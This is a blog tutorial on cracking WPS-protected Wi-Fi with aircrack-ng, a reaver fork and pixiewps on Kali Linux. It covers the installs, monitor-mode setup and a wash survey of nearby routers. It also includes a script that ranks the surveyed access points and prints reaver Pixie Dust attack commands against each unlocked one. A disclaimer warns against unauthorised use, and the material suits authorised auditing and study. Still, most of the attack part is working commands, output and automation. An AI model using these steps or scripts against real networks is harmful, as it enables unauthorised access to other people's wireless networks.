Tuesday, April 11, 2017

Kali Linux Tutorial Wireless Auditing with Aircrack ng Reaver and Pixiewps



Wireless Auditing with Aircrack-ng, Reaver, and Pixiewps - picateshackz.com

PicaTesHackZ does not condone wireless auditing of systems you are not authorized to test. We do, however, encourage you to use this knowledge to learn and practise exploitation with the latest wireless-auditing tools. Although I already did a write-up on reaver and pixiewps, there have been updates since, I have run more tests, and I know the tools better now. Please keep in mind that it is illegal to penetrate networks that are not your own without proper permission. That responsibility falls on you: do what you will, but we accept no liability for your actions.

Prerequisites


  • Kali-Linux (32bit or 64bit)
  • Active Internet Connection
  • A Brain


Introduction

OK, to start, boot up Kali. The first step is to upgrade to aircrack-ng 1.2 RC, the reaver fork 1.5.2 and pixiewps 1.1. On Kali this is very simple; after the Kali instructions I will also show how to compile the reaver fork and pixiewps from source. There are several people to thank for this project, so I will just say thank you to the creators of Kali Linux, the creators of the aircrack-ng suite, the creators of reaver (and of the fork), the creator of pixiewps, and the individual who discovered the Pixie Dust weakness that pixiewps exploits. I am not going to go very deep into the general use of aircrack-ng; there is so much documentation and so many tutorials around that it would be an overlooked and oversized section. I will only go over the changes in the new version that matter for our purposes.


Upgrading/Installing Aircrack-ng, reaver fork, and pixiewps

Kali Instructions:

Code:
apt-get update
apt-get dist-upgrade

OK, we're done; the packaged versions are now current.

Compiling forked reaver and pixiewps from source:


1. Install dependencies (build-essential provides gcc and make, which the builds below need; it is usually already present on Kali):

Code: 
apt-get install build-essential libpcap-dev libssl-dev sqlite3 libsqlite3-dev unzip


2. Download the files (without -O, wget would save the first archive as master.zip and the second as master.zip.1, so the archives are named explicitly to match the unzip step):

Code: 
wget -O reaver-wps-fork-t6x-master.zip https://github.com/t6x/reaver-wps-fork-t6x/archive/master.zip
wget -O pixiewps-master.zip https://github.com/wiire/pixiewps/archive/master.zip


3. Extract the downloads:

Code: 
unzip reaver-wps-fork-t6x-master.zip
unzip pixiewps-master.zip


4. Clean up the zip files:

Code:
rm -f reaver-wps-fork-t6x-master.zip
rm -f pixiewps-master.zip


5. Set up reaver:

Change into the directory the archive was extracted to. The path is relative to where you ran unzip, not /reaver-wps-fork-t6x-master at the root of the filesystem:

Code:
cd reaver-wps-fork-t6x-master/src
chmod +x configure
./configure
make
make install

(chmod 777 also works, but it makes the script world-writable; the execute bit is all configure needs. make install writes to /usr/local and needs root, which you are on Kali.)


6. Set up pixiewps:

From the directory where you extracted the archives, change into the pixiewps source directory:

Code:
cd pixiewps-master/src
make
make install

OK, now we are set up with the latest versions. Even if the applications are updated by the time you read this, the procedure stays valid, because the links download the master branch of each GitHub repository (which also means the version numbers you see may differ from the ones shown here).

How to use aircrack-ng


So let's focus on the changes to airodump-ng and airmon-ng. We are going after the WPS PIN, so what has the aircrack-ng team done to help airodump-ng locate WPS-enabled routers? They added a --wps option.

An example command we can run with airodump-ng is airodump-ng --wps wlan1mon (the screenshot of its output is not reproduced here).

So, as you can see, airodump-ng can now flag WPS-enabled routers. We do have another option for this, wash from the reaver fork, but I will get to that later; we are talking about aircrack-ng right now. The other thing to notice in that output is that my wireless adapter has a new name: airmon-ng now handles monitor mode on your devices differently. Let's take a look at the command.


Example airmon-ng command:

Code:
airmon-ng start wlan0

Replace wlan0 with your adapter (mine is wlan1). A channel number may follow the interface name; nothing else should. In the run below I appended -v, and airmon-ng handed it to iw as if it were a channel, which is where the iw usage message in the middle of the output comes from. The monitor interface was still created, so the run is shown as it happened.

The example output is as follows (mine is wlan1):

Code:
root@kali:~# airmon-ng start wlan1 -v
Found 3 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

  PID Name
 2505 NetworkManager
 2610 wpa_supplicant
10481 dhclient

PHY     Interface       Driver          Chipset

phy0    wlan1           rt2800pci       Ralink corp. RT3090 Wireless 802.11n 1T/1R PCIe
Usage:  iw [options] dev <devname> set channel <channel> [HT20|HT40+|HT40-]
Options:
        --debug         enable netlink debugging

                (mac80211 monitor mode vif enabled for [phy0]wlan1 on [phy0]wlan1mon)
                (mac80211 station mode vif disabled for [phy0]wlan1)

airmon-ng now also lists the processes that can interfere with monitor mode (NetworkManager, wpa_supplicant and dhclient above). It only warns about them; if airodump-ng or reaver keeps losing the interface after a while, stop them first with airmon-ng check kill. As shown above, the new monitor-mode interface is:
wlan1mon

We'll run iwconfig to confirm:

Code: 
root@kali:~# iwconfig
wlan1mon  IEEE 802.11bgn  Mode:Monitor  Frequency:2.437 GHz  Tx-Power=20 dBm 
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Power Management:off
         
eth0      no wireless extensions.

lo        no wireless extensions.

OK, so these changes to aircrack-ng will help us crack some access points.
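Scripts that chain airmon-ng, airodump-ng, wash and reaver tend to hard-code the monitor interface, which is why older write-ups (and the usage examples of wash and reaver further down) still say mon0 while the current airmon-ng creates wlan1mon. The following is an added example, not code from the original post or from aircrack-ng: two small shell functions that pull the created interface name and the warned-about PIDs out of airmon-ng's output, so a script can pass the right interface on and decide whether to run airmon-ng check kill first. The text they parse is constructed from the run shown above, iw usage noise included, since that is what a real run produced here.

```bash
#!/bin/sh
# Added example, not code from the original post or from aircrack-ng:
# extract the monitor interface and the interfering PIDs from the output
# of `airmon-ng start <iface>`.  AIRMON_OUTPUT is constructed from the run
# shown above (including the stray iw usage lines that run produced).

AIRMON_OUTPUT='Found 3 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

  PID Name
 2505 NetworkManager
 2610 wpa_supplicant
10481 dhclient

PHY     Interface       Driver          Chipset

phy0    wlan1           rt2800pci       Ralink corp. RT3090 Wireless 802.11n 1T/1R PCIe
Usage:  iw [options] dev <devname> set channel <channel> [HT20|HT40+|HT40-]
Options:
        --debug         enable netlink debugging

                (mac80211 monitor mode vif enabled for [phy0]wlan1 on [phy0]wlan1mon)
                (mac80211 station mode vif disabled for [phy0]wlan1)'

# monitor_iface  (airmon-ng output on stdin)
# Prints the interface named after "on [phyN]" in the "monitor mode vif
# enabled" line.  Exits non-zero (via grep) when no such line exists, e.g.
# when the driver does not support monitor mode.
monitor_iface() {
    sed -n 's/.*monitor mode vif enabled for \[[^]]*\][^ ]* on \[[^]]*\]\([^)]*\)).*/\1/p' \
        | grep .
}

# interfering_pids  (airmon-ng output on stdin)
# Prints the PIDs listed between the "PID Name" header and the next blank
# line, one per line.  These are the processes `airmon-ng check kill` stops.
interfering_pids() {
    awk '/^ *PID +Name/ { inlist = 1; next }
         inlist && NF == 0 { inlist = 0 }
         inlist && $1 ~ /^[0-9]+$/ { print $1 }'
}

if mon=$(printf '%s\n' "$AIRMON_OUTPUT" | monitor_iface); then
    echo "monitor interface: $mon"
    echo "processes airmon-ng warned about:"
    printf '%s\n' "$AIRMON_OUTPUT" | interfering_pids
else
    echo "airmon-ng did not report a monitor interface" >&2
fi
```

On a live system replace the embedded text with the real output, for example mon=$(airmon-ng start wlan1 | monitor_iface), and pass "$mon" to airodump-ng, wash and reaver; if interfering_pids prints anything, run airmon-ng check kill before starting the capture.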

Using wash to find WPS enabled routers

OK, so our options for wash are as follows:

Code:
Wash v1.5.2 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212 & Wiire

Required Arguments:
        -i, --interface=<iface>              Interface to capture packets on
        -f, --file [FILE1 FILE2 FILE3 ...]   Read packets from capture files

Optional Arguments:
        -c, --channel=<num>                  Channel to listen on [auto]
        -o, --out-file=<file>                Write data to file
        -n, --probes=<num>                   Maximum number of probes to send to each AP in scan mode [15]
        -D, --daemonize                      Daemonize wash
        -C, --ignore-fcs                     Ignore frame checksum errors
        -5, --5ghz                           Use 5GHz 802.11 channels
        -s, --scan                           Use scan mode
        -u, --survey                         Use survey mode [default]
        -P, --file-output-piped              Allows Wash output to be piped. Example. wash x|y|z...
        -g, --get-chipset                    Pipes output and runs reaver alongside to get chipset
        -h, --help                           Show help

Example:
        wash -i mon0



OK, so now I want to point out the new -g option, which also tries to identify the router's chipset (it runs reaver alongside the scan to get it). It slows down how quickly routers are displayed, and it requires a channel to be set with -c. The command we will use is the following (with or without -g). The -C flag makes wash keep frames whose checksum is wrong; at long range a fair share of beacons arrive damaged, and without -C those frames are dropped and the access point may never be listed:

Code:
wash -i wlan1mon -C


Our output is as follows:

Code:
root@kali:~# wash -i wlan1mon -C

Wash v1.5.1 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com>
mod by DataHead

BSSID                  Channel       RSSI       WPS Version       WPS Locked        ESSID
---------------------------------------------------------------------------------------------------------------
84:1B:5E:F8:21:62       1            -79        1.0               No                NETGEAR10
44:32:C8:53:D1:A4       1            -85        1.0               No                HOME-D1A4
08:86:3B:21:F3:1C      11            -81        1.0               No                belkin.31c
66:EB:8C:3C:4A:31      11            -77        1.0               No                DIRECT-8C3CCA31
00:1D:D6:9F:FF:F0       1            -83        1.0               No                HOME-FFF2
6C:B0:CE:9F:DD:25      11            -75        1.0               No                NETGEAR91
90:1A:CA:41:63:60      11            -81        1.0               No                HOME-6362


Looking at this, I seem to be fairly far from several targets (RSSI between -75 and -85 dBm), so capturing the frames reaver needs from them is going to be difficult. So let's look at the usage for this reaver fork and go over the options that drive pixiewps directly.


Code:
Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212 & Wiire

Required Arguments:
        -i, --interface=<wlan>          Name of the monitor-mode interface to use
        -b, --bssid=<mac>               BSSID of the target AP

Optional Arguments:
        -m, --mac=<mac>                 MAC of the host system
        -e, --essid=<ssid>              ESSID of the target AP
        -c, --channel=<channel>         Set the 802.11 channel for the interface (implies -f)
        -o, --out-file=<file>           Send output to a log file [stdout]
        -s, --session=<file>            Restore a previous session file
        -C, --exec=<command>            Execute the supplied command upon successful pin recovery
        -D, --daemonize                 Daemonize reaver
        -a, --auto                      Auto detect the best advanced options for the target AP
        -f, --fixed                     Disable channel hopping
        -5, --5ghz                      Use 5GHz 802.11 channels
        -v, --verbose                   Display non-critical warnings (-vv for more)
        -q, --quiet                     Only display critical messages
        -K  --pixie-dust=<number>       [1] Run pixiewps with PKE, PKR, E-Hash1, E-Hash2, E-Nonce and Authkey (Ralink, Broadcom, Realtek)
        -Z, --no-auto-pass              Do NOT run reaver to auto retrieve WPA password if pixiewps attack is successful
        -h, --help                      Show help

Advanced Options:
        -p, --pin=<wps pin>             Use the specified 4 or 8 digit WPS pin
        -d, --delay=<seconds>           Set the delay between pin attempts [1]
        -l, --lock-delay=<seconds>      Set the time to wait if the AP locks WPS pin attempts [60]
        -g, --max-attempts=<num>        Quit after num pin attempts
        -x, --fail-wait=<seconds>       Set the time to sleep after 10 unexpected failures [0]
        -r, --recurring-delay=<x:y>     Sleep for y seconds every x pin attempts
        -t, --timeout=<seconds>         Set the receive timeout period [5]
        -T, --m57-timeout=<seconds>     Set the M5/M7 timeout period [0.20]
        -A, --no-associate              Do not associate with the AP (association must be done by another application)
        -N, --no-nacks                  Do not send NACK messages when out of order packets are received
        -S, --dh-small                  Use small DH keys to improve crack speed
        -L, --ignore-locks              Ignore locked state reported by the target AP
        -E, --eap-terminate             Terminate each WPS session with an EAP FAIL packet
        -n, --nack                      Target AP always sends a NACK [Auto]
        -w, --win7                      Mimic a Windows 7 registrar [False]
        -X, --exhaustive                Set exhaustive mode from the beginning of the session [False]
        -1, --p1-index                  Set initial array index for the first half of the pin [False]
        -2, --p2-index                  Set initial array index for the second half of the pin [False]
        -P, --pixiedust-loop            Set into PixieLoop mode (doesnt send M4, and loops through to M3) [False]
        -W, --generate-pin              Default Pin Generator by devttys0 team [1] Belkin [2] D-Link

Example:
        reaver -i mon0 -b 00:AA:BB:11:22:33 -vv -K 1

So the command we are going to run is as follows, with XX:XX:XX:XX:XX:XX replaced by the target BSSID and # by its channel, both taken from the wash output:

Code:
reaver -i wlan1mon -b XX:XX:XX:XX:XX:XX -vv -c # -K 1 -P
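The selection step that leads to this command (reading the wash survey, discarding the far-away and locked access points, and filling in the BSSID and channel) is easy to script. The following is an added example, not code from the original post or from the reaver, wash or pixiewps projects: it reads a saved wash survey, keeps the unlocked access points at or above a chosen RSSI, and prints one reaver -K 1 -P command per target, strongest signal first. The -80 dBm cut-off and the interface name are assumptions, and the final WPS-locked line in the sample is constructed to exercise the lock filter; the rest of the sample is the survey shown above.

```bash
#!/bin/sh
# Added example, not code from the original post or from the reaver/wash
# projects: turn a saved `wash -i wlan1mon -C` survey into one
# `reaver ... -K 1 -P` command per usable access point.
# Assumptions: the RSSI cut-off (-80 dBm) and the interface name are chosen
# for illustration.  The survey below is the one shown in the post, plus a
# constructed last line (LOCKED-AP) so that the WPS Locked filter is exercised.

WASH_SURVEY='Wash v1.5.1 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com>
mod by DataHead

BSSID                  Channel       RSSI       WPS Version       WPS Locked        ESSID
---------------------------------------------------------------------------------------------------------------
84:1B:5E:F8:21:62       1            -79        1.0               No                NETGEAR10
44:32:C8:53:D1:A4       1            -85        1.0               No                HOME-D1A4
08:86:3B:21:F3:1C      11            -81        1.0               No                belkin.31c
66:EB:8C:3C:4A:31      11            -77        1.0               No                DIRECT-8C3CCA31
00:1D:D6:9F:FF:F0       1            -83        1.0               No                HOME-FFF2
6C:B0:CE:9F:DD:25      11            -75        1.0               No                NETGEAR91
90:1A:CA:41:63:60      11            -81        1.0               No                HOME-6362
AA:BB:CC:DD:EE:FF       6            -60        2.0               Yes               LOCKED-AP'

# select_targets MIN_RSSI  (wash survey on stdin)
# Prints "RSSI BSSID CHANNEL ESSID" for every AP with RSSI >= MIN_RSSI whose
# WPS Locked column is "No", strongest signal first.  The banner, header and
# rule lines are skipped, and an ESSID that contains spaces is re-joined.
select_targets() {
    awk -v min="$1" '
        /^Wash / || /^Copyright/ || /^mod by/ || /^BSSID/ || /^-+$/ || NF == 0 { next }
        $3 + 0 >= min + 0 && $5 == "No" {
            essid = $6
            for (i = 7; i <= NF; i++) essid = essid " " $i
            print $3, $1, $2, essid
        }' | sort -k1,1nr
}

# reaver_commands IFACE MIN_RSSI  (wash survey on stdin)
# One reaver invocation per selected target, in the form used in this post:
# -c fixes the channel wash reported, -K 1 feeds the captured PKE, PKR,
# E-Hash1, E-Hash2, E-Nonce and AuthKey to pixiewps, and -P keeps reaver in
# PixieLoop mode (no M4 is sent; it loops back to M3).
reaver_commands() {
    iface=$1
    select_targets "$2" | while read -r rssi bssid channel essid; do
        printf 'reaver -i %s -b %s -vv -c %s -K 1 -P   # %s (%s dBm)\n' \
            "$iface" "$bssid" "$channel" "$essid" "$rssi"
    done
}

printf '%s\n' "$WASH_SURVEY" | reaver_commands wlan1mon -80
```

With a live survey, save wash's output to a file (wash needs its -P option when its output is piped rather than shown on a terminal) and feed that file to reaver_commands instead of the embedded sample. The list is only an ordering of candidates; each reaver run still has to be started and watched individually, since a Pixie Dust result depends on the target's chipset, not on signal strength alone.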


Let's focus on the -K 1 and -P options.